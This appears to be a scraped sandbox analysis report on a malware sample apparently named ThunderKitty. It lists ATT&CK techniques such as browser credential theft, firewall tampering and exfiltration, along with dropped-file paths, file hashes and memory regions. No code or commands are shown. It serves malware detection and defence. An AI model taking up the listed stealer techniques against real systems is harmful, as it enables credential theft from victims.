
T1098

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Account Manipulation

T1098

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

File and Directory Discovery

T1083

Network Service Discovery

T1046

Permission Groups Discovery

T1069

Local Groups

T1069.001

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

System Network Connections Discovery

T1049

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
23aba7e7ecd37fd9f076dbd4d6e981e2

SHA1
40150b7db90f125b7b1c7cae65250f3a13a5bbb3

SHA256
a67ce8b05ec37c76167b8769946b840cee681b0c3a19b8d7c56835ad21221b12

SHA512
fce8455921832c8960e1aa783091b83fe17aa885b0a86e92d2ada35c76bfc79122d90b0260f6571018d7317ffee0c3bedc7f0bbf4d21a41e77d02e25892d3c9a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
0789009e381ff689e09144d17087b434

SHA1
43ecb03b5bf2aedd9a0ef7aad408f32b3ecf2eed

SHA256
120dcff0b78993813606335996b0ff453a428710a8f2af6700070fb210cacdad

SHA512
4064b89ef58eab748f0ec6a4ce619b04fb321df90fe32c54ed65e3f02e0116897b066eb41a3586ef8bb513f252b828598196f43e16f3b669d8f11a949b3d65a8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
961e4d973ca88badfc54a8b861a23778

SHA1
168b3fd9d920ecc767f2140f1a8ddcb4629e544b

SHA256
74f9ffbdad95bbbf96f60ff9302fae311edba1cb6fc6fcc75d32bd07996dc579

SHA512
d0149444ed08697e48342faf323f07f8b88ceff0124b939079530575cffc817a37e01515b5bed4f62fd381539bff7cf74cf57e4d502508d8a2e8ef25253e2122

Download Submit
C:\Users\Admin\AppData\Local\Temp\1yzrwmzd\1yzrwmzd.dll

Filesize
4KB

MD5
1519647e17290ba84b7840886ec18889

SHA1
fbb8266e929598ac8860f5c4c8bd4bf0b57b6c02

SHA256
212ebe62229b28ee8e6c2aa039f2e44e7aa512133cae1fdf03d8438f01d13ff9

SHA512
474e02dc3a6bf875e3ffeb956a99e6244ce12604ed890b83095f9f064534cf6c4fcc47dd46cae736c7510c3a737c3d85999efc6fa7eb9bc213a01a343a54b9d1

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESA78A.tmp

Filesize
1KB

MD5
0934817aa87fc39c32a7f9f9a14e23e3

SHA1
343750c3013206ef0a395c67a97219f1f2fcbbb9

SHA256
0cc37b2a908609f30921d5e06a20ff9179073321d35528426a75efdf48d6cd8e

SHA512
399803b784aed1938622afd263eef74917b957905dd6dd07e72464dccefb173a7ba9cd282166a8384b9a51f816db30c1ffc77dc76f13e5528ac1baba95864f15

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESA846.tmp

Filesize
1KB

MD5
95c84ab1832a340e0872aa6f300abc75

SHA1
4ca4ca63cfc5d3cc19276bd6412eed8aa2fcdf42

SHA256
9548c6e84a11144b184a3b0a0d9e5e55ff58e8589b03749ea6ab144bee06ec9d

SHA512
c368b98281cc926fb5a00676e1682172460f5a448d54d0cd7b0363194a08c8458a06c31b4065edc83ed236c6bc6f595d7f99ce8148d5c806a69621c19622b284

Download Submit
C:\Users\Admin\AppData\Local\Temp\ThunderKitty.zip

Filesize
95KB

MD5
6db2a6f7ef31d40e0458deb7e2cc87dc

SHA1
cd6555c9129c98e4b48a750e45c799308ed1602f

SHA256
e74e6b61d28a6a37fab6ed031ced3c406b7a20707a60b7340caf983a09017655

SHA512
dfa058d4ae994522d1cd06f53a6e5ffb12dd3e5d05210aeef90aa952f114a39b6f83500a000573398b388a70e7abe762759380f10e9907a9fd01da8f300d8efc

Download Submit
C:\Users\Admin\AppData\Local\Temp\ThunderKitty\SystemInfo\ThunderKitty-ScrapedCMDS.txt

Filesize
24KB

MD5
eea61ca06998f767fbe8ebab1e8722be

SHA1
7218a6d8721a4e23e701fe06c535e70b2cc3620a

SHA256
f9d41514957ae515387807f5c45c345e918a83c85dc478d89bd3ef180b500e97

SHA512
358618df9b8527770a3a687a97409a82e96b40eaa88ccc815d69e74ff63a3a01faa63e6af28c0d7b367441337a508e7b1312967c9d73a4a4dd67fac663123242

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zqgxs1ex.jwa.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\daafce0k\daafce0k.dll

Filesize
4KB

MD5
056a7b2f83ee8ed820f45d7cffdd6d82

SHA1
677620c9c9ca7f53a8046025487cbeeb55cf9543

SHA256
dba640f969c63f6db66f246f7d323dfd99110820cfed9a5cc2a347968f96f3cf

SHA512
c511c2d44706d6e8604230ab641342e43169b9b5ca5797235439024b54e3e3ea0f4ce906fda978da8f660bcdeb7264f26f39f37e40d5cc0fc8ba337df38e1555

Download Submit
C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1

Filesize
2KB

MD5
9758656bbe8589c66bb241b052490c72

SHA1
b73da83fb3ae6b86c6365769a04de9845d5c602c

SHA256
e4bfe191530cc53138c4a265755539f8a115f7828faba79dfac91f3184b26351

SHA512
da9a8ecba8c2071e467f2d72fac524843fb0011c8486dd95e8b948b1c7f91bf02bcb80c20a01eddb6971b96db5ebde5f7c4c607e6b6d15e75d971ea104436e34

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\1yzrwmzd\1yzrwmzd.cmdline

Filesize
369B

MD5
dcdfc9c851d01091d47b12923188cd91

SHA1
6ad9b0177ceed881a19d8f720de9cf124d6b0940

SHA256
4e97a427337f975c930deb707199723bc3c82865b3f80b4100b3d62918b786ae

SHA512
9ae35895f3e8f95abd37045ba2021e1355b788a87a0de9da9e2b58a22b325897b1501d673e386293a3c4ed421a568cdf8412abc7ade71dfb35c6b3dad67b0402

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\1yzrwmzd\CSCB20828EEEC1F4B9D8FDE9BB0F1F9B54.TMP

Filesize
652B

MD5
f696daf186f7847a0edfd0ec8a1fb83a

SHA1
4127e9a1c39562dc44614dcfc1a381307c6d9740

SHA256
4798605f272b7160841dfb527c786254eba8f5d99e8a9e28f845162bb320a5f6

SHA512
2434ca865c6b2d58f9ee99252a7a1c2a4dab8afd4c20b8a417fe62934ccd6590e1ed21e66605a03b753b4239439a6681900a79cad1f75e12888551ae1e950fff

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\daafce0k\CSC22DE2C2D21AF43D28226210AF52752.TMP

Filesize
652B

MD5
0154a3df39f3dffdfa66a349de81a1cd

SHA1
ba167bdd66260d8b192a8cd7151236da7c027246

SHA256
12a18d0dab187d009a095e4c26ca4beea77372e3bc9558cef0201c1a111b918a

SHA512
998c1783afedc15026e418760c32ece55806b95983655e99a5900317c5f59a72065a04573bf654470843249a41ff992a1935fe912c2aabda5446b06f7f7109da

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\daafce0k\daafce0k.0.cs

Filesize
1KB

MD5
8a1e7edb2117ec5dde9a07016905923b

SHA1
0155dbeeb16333e2eaa767b0209750efee56f47f

SHA256
c379ac84c970f2055851b084c44575a5e4b5a70dc25f0acdd49aad306489b007

SHA512
4ff0601803a006c661c962fe158cd5e9f40031d6b4fd7c5a05969a52d812e1fcb0aab20916fcad6c61c6d44cc7cfdf1e4f344f22ced937a0cd757ad841d3ab21

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\daafce0k\daafce0k.cmdline

Filesize
369B

MD5
76b50dc28eea1a7bd884659125de9bbe

SHA1
5dfadb9c38716e713a44443853bf5fb118a9bab9

SHA256
5e2cf506d09f751aed6e6bcc9cd69224d670791367c5d17498c1eb5ecaed1923

SHA512
9089a94e0003abc403880aec1f129470ce199275f474ab9b14b46887731704150c38e4b16bb726050faabbe418c08d63d2866e2c44f79d5723549892c54df176

Download Submit
memory/2636-34-0x00007FFAD8AF0000-0x00007FFAD95B1000-memory.dmp

Filesize
10.8MB

Download
memory/2636-82-0x00007FFAD8AF0000-0x00007FFAD95B1000-memory.dmp

Filesize
10.8MB

Download
memory/2636-32-0x00007FFAD8AF0000-0x00007FFAD95B1000-memory.dmp

Filesize
10.8MB

Download
memory/2636-22-0x00007FFAD8AF0000-0x00007FFAD95B1000-memory.dmp

Filesize
10.8MB

Download
memory/4020-95-0x000001EFA1720000-0x000001EFA174A000-memory.dmp

Filesize
168KB

Download
memory/4020-128-0x000001EFA1510000-0x000001EFA151A000-memory.dmp

Filesize
40KB

Download
memory/4020-78-0x000001EF88690000-0x000001EF88698000-memory.dmp

Filesize
32KB

Download
memory/4020-127-0x000001EFA1720000-0x000001EFA1732000-memory.dmp

Filesize
72KB

Download
memory/4020-96-0x000001EFA1720000-0x000001EFA1744000-memory.dmp

Filesize
144KB

Download
memory/4400-84-0x000001C5F8A70000-0x000001C5F9216000-memory.dmp

Filesize
7.6MB

Download
memory/4400-90-0x00007FFAD8AF0000-0x00007FFAD95B1000-memory.dmp

Filesize
10.8MB

Download
memory/4400-8-0x000001C5F7DC0000-0x000001C5F7DE2000-memory.dmp

Filesize
136KB

Download
memory/4400-0-0x00007FFAD8AF3000-0x00007FFAD8AF5000-memory.dmp

Filesize
8KB

Download
memory/4400-64-0x000001C5F7EF0000-0x000001C5F7EF8000-memory.dmp

Filesize
32KB

Download
memory/4400-2-0x00007FFAD8AF0000-0x00007FFAD95B1000-memory.dmp

Filesize
10.8MB

Download
memory/4400-1-0x00007FFAD8AF0000-0x00007FFAD95B1000-memory.dmp

Filesize
10.8MB

Download